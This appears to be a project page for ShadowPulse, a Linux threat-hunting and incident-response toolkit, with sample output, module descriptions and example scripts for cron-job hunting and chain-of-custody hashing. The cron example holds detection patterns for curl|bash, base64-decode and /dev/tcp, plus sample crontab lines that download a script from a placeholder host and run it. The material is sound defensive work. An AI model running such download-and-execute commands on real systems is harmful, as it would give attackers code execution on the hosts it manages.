ShadowPulse
Linux Threat Hunting and Incident Response Toolkit. Automated evidence collection, malware detection, persistence hunting, IOC extraction, and forensic reporting.
When a breach happens, the first 30 minutes determine everything. ShadowPulse gives incident responders a production-ready toolkit that deploys in seconds and covers the entire forensic lifecycle — from volatile data capture to chain-of-custody reporting.
Feature highlights: Evidence Collection, Malware Detection, Persistence Hunting, IOC Extraction, Webshell Scanner, Rootkit Checks, Timeline Reconstruction, Chain of Custody, HTML Reports
$ sudo ./shadowpulse.sh
_____ __ __ ____ __
/ ___// /_ ____ _____/ /___ _ __ / __ \__ __/ /_____ ___
\__ \/ __ \/ __ / __ / __ \ | /| / / / /_/ / / / / / ___/ _ \
___/ / / / / /_/ / /_/ / /_/ / |/ |/ / / ____/ /_/ / (__ ) __/
/____/_/ /_/\__,_/\__,_/\____/|__/|__/ /_/ \__,_/_/____/\___/
[INFO] Case directory: /var/shadowpulse/case-20260309-143022
[PASS] System: web-prod-01 (5.15.0-92-generic)
═══ MODULE 1: VOLATILE DATA COLLECTION ═══
[DATA] Process tree captured (247 processes)
[ALERT] [HIGH] Deleted files still open — 3 deleted files held open
[PASS] Volatile data collection complete
═══ MODULE 2: PERSISTENCE MECHANISM HUNTING ═══
[ALERT] [CRITICAL] Suspicious cron job — contains curl|bash indicators
[ALERT] [CRITICAL] Backdoor in shell profile — .bashrc injection
[DATA] SSH authorized_keys: 4 keys found
═══ MODULE 3: MALWARE & WEBSHELL DETECTION ═══
[ALERT] [CRITICAL] Potential webshells detected — 2 files match signatures
[ALERT] [HIGH] Recently modified system binaries — 3 binaries changed
[PASS] No crypto miners detected
═══ MODULE 7: IOC EXTRACTION ═══
[DATA] External IPs (active connections): 12
[ALERT] [HIGH] Suspicious commands in shell history — 7 patterns found
════════════════════════════════════════════════════════════
ShadowPulse Investigation Complete
Hostname: web-prod-01
Modules: 8
Findings: 14
Critical: 3
High: 5
Medium: 4
Low: 2
Evidence: /var/shadowpulse/case-20260309-143022/evidence/
Report: /var/shadowpulse/case-20260309-143022/report.html
════════════════════════════════════════════════════════════
Forensic Modules
8 modules covering the entire incident response lifecycle
Each module collects evidence, detects anomalies, and generates findings with severity classification and remediation guidance. All evidence is SHA-256 hashed for chain-of-custody preservation.
01 Volatile Data Collection
Process trees, open file descriptors, deleted-but-open files, kernel modules, memory maps, mount points, environment variables with secret detection.
ps auxwwf | lsof | /proc/maps | lsmod | mount
02 Persistence Hunting
Cron jobs (system + user), systemd services and timers, init scripts, rc.local, shell profiles (.bashrc, .profile), SSH authorized_keys, LD_PRELOAD, at jobs.
crontab | systemctl | /etc/init.d | .bashrc | authorized_keys
03 Malware and Webshell Detection
Hidden files in /tmp and /dev/shm, SUID binary audit, webshell signature scanning (14 patterns), crypto miner detection, reverse shell detection, rootkit checks, package integrity verification.
find | grep signatures | rpm -Va | dpkg --verify
04 User and Authentication Analysis
UID 0 account audit, passwordless accounts, sudoers NOPASSWD review, login history (success + failed), SSH activity analysis, recently created users.
/etc/passwd | /etc/shadow | sudoers | last | lastb
05 Network Forensics
Active connections with process mapping, suspicious C2 port detection (4444, 5555, 1337), DNS configuration audit, ARP table, routing, firewall rules, promiscuous mode detection.
ss -tulnap | ip neigh | iptables | nftables | ip link
06 Log Analysis
Collection of auth, syslog, kernel, and web server logs. Log tampering detection (empty/truncated files). Brute force indicators, privilege escalation attempts, audit log analysis.
/var/log/* | ausearch | grep patterns
07 IOC Extraction
External IP addresses (connections + logs), domain extraction, URL harvesting, file hashes (SHA-256) of suspicious binaries, shell history analysis for attack commands.
ss | grep -oE | sha256sum | history analysis
08 Timeline Reconstruction
File modification timeline (72 hours), authentication event timeline, package installation history, login session timeline. Sorted chronologically for investigation.
find -printf '%T+' | last | dpkg.log | rpm --last
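As an added illustration of the Module 2 cron check (this is example code written here, not ShadowPulse's own implementation): a POSIX shell function that flags crontab entries carrying download-and-execute or decode-and-execute indicators, keeps the original line numbers as evidence, ignores commented-out entries, and writes ShadowPulse-style ALERT lines to an evidence file. The indicator regex, the sample crontab and the file names are constructed for the demo.

```shell
#!/bin/sh
# Added example, not ShadowPulse's own code: the check behind a
# "[CRITICAL] Suspicious cron job -- contains curl|bash indicators" finding.

# Download-and-execute and obfuscation indicators in a scheduled command
# (extended regex, matched case-insensitively). Tune to your environment.
CRON_INDICATORS='(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|/dev/(tcp|udp)/'

# hunt_cron_file FILE EVIDENCE_OUT
# Appends one ALERT line per matching, non-comment crontab entry to
# EVIDENCE_OUT (original line numbers kept as evidence) and echoes the hit count.
hunt_cron_file() {
    file=$1; out=$2
    # grep -n first so line numbers refer to the original file, then drop
    # commented-out entries (a "#" right after the line number) so they cannot fire.
    matches=$(grep -n -E -i "$CRON_INDICATORS" "$file" | grep -v -E '^[0-9]+:[[:space:]]*#' || true)
    if [ -z "$matches" ]; then echo 0; return 0; fi
    printf '%s\n' "$matches" | while IFS= read -r m; do
        printf '[ALERT] [CRITICAL] Suspicious cron job in %s (line %s)\n' "$file" "$m" >>"$out"
    done
    printf '%s\n' "$matches" | wc -l | tr -d ' '
}

# Constructed sample crontab (not from a real host): two live suspicious
# entries (lines 3 and 5), one benign entry and one commented-out decoy.
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * curl -s http://example.invalid/x.sh | bash
# */5 * * * * wget -qO- http://example.invalid/y.sh | sh
@reboot echo dGVzdA== | base64 -d | sh'

# demo_hunt: runs the check on the sample inside a temporary case directory,
# echoes the hit count and shows the evidence file on stderr.
demo_hunt() {
    case_dir=$(mktemp -d)
    printf '%s\n' "$SAMPLE_CRON" >"$case_dir/crontab.txt"
    hunt_cron_file "$case_dir/crontab.txt" "$case_dir/cron-findings.txt"
    cat "$case_dir/cron-findings.txt" >&2
}
```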
Deployment
Deploys in seconds. No dependencies. No installation.
# Deploy to a compromised system
curl -sO https://raw.githubusercontent.com/SiteQ8/ShadowPulse/main/shadowpulse.sh
chmod +x shadowpulse.sh
sudo ./shadowpulse.sh
# Run specific modules only
sudo ./shadowpulse.sh --volatile --malware --network
# Hunt for persistence and lateral movement
sudo ./shadowpulse.sh --persistence --users --logs
# Extract IOCs for threat intel sharing
sudo ./shadowpulse.sh --ioc --timeline
# Custom output directory for case management
sudo ./shadowpulse.sh --output /cases/INC-2026-042
Output
Forensic evidence package with chain of custody
/var/shadowpulse/case-20260309-143022/
├── evidence/ Raw collected artifacts
│ ├── processes-tree.txt Process hierarchy snapshot
│ ├── open-files.txt File descriptor listing
│ ├── deleted-files-open.txt Deleted but open files
│ ├── kernel-modules.txt Loaded kernel modules
│ ├── cron-system.txt System cron jobs
│ ├── cron-users.txt Per-user cron jobs
│ ├── systemd-services.txt All systemd units
│ ├── ssh-authorized-keys.txt SSH public keys
│ ├── webshells-*.txt Detected webshell files
│ ├── suid-binaries.txt SUID/SGID audit
│ ├── netstat-established.txt Active connections
│ ├── ioc-ips.txt External IP addresses
│ ├── ioc-hashes.txt SHA-256 file hashes
│ ├── ioc-history.txt Suspicious commands
│ ├── timeline-files.txt File modification timeline
│ └── ... (50+ evidence files)
├── chain-of-custody.sha256 SHA-256 hashes of ALL evidence
└── report.html Visual forensic report
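The chain-of-custody idea described above (every evidence file SHA-256 hashed, recorded in chain-of-custody.sha256), shown as an added example that is not ShadowPulse's own code: sealing a case directory into a manifest and later verifying that no evidence file was altered or removed. It assumes coreutils sha256sum and evidence file names without spaces or newlines; the sample case contents are constructed.

```shell
#!/bin/sh
# Added example, not ShadowPulse's own code: build and verify a
# chain-of-custody.sha256 manifest over a case's evidence/ directory.
# Assumes coreutils sha256sum. Paths in the manifest are relative to the
# case dir so it stays valid after the package is copied to another system.

# custody_seal CASE_DIR: hash every file under evidence/ (sorted, so an
# unchanged case re-seals to an identical manifest) and echo the entry count.
custody_seal() {
    case_dir=$1
    ( cd "$case_dir" && find evidence -type f | LC_ALL=C sort |
        while IFS= read -r f; do sha256sum "$f"; done ) >"$case_dir/chain-of-custody.sha256"
    wc -l <"$case_dir/chain-of-custody.sha256" | tr -d ' '
}

# custody_verify CASE_DIR: re-hash each listed file. Echoes "intact" when all
# match, otherwise "tampered: <file>" / "missing: <file>" per problem and
# returns 1. Files added after sealing are not in the manifest, so compare
# "find evidence -type f | wc -l" with the entry count if that matters.
custody_verify() {
    case_dir=$1
    status=0
    while read -r sum f; do
        if [ ! -f "$case_dir/$f" ]; then
            echo "missing: $f"; status=1
        elif [ "$(sha256sum "$case_dir/$f" | cut -d' ' -f1)" != "$sum" ]; then
            echo "tampered: $f"; status=1
        fi
    done <"$case_dir/chain-of-custody.sha256"
    [ "$status" -eq 0 ] && echo intact
    return "$status"
}

# make_sample_case: constructed evidence package (not real host data) in a
# temp dir, mirroring two of the evidence file names used above; echoes its path.
make_sample_case() {
    d=$(mktemp -d)
    mkdir "$d/evidence"
    printf 'PID 1 /sbin/init\nPID 4242 /tmp/.x/worker\n' >"$d/evidence/processes-tree.txt"
    printf 'httpd 1234 /var/log/httpd/access_log (deleted)\n' >"$d/evidence/open-files.txt"
    echo "$d"
}
```

Typical flow: `custody_seal` right after collection, then `custody_verify` whenever the package changes hands.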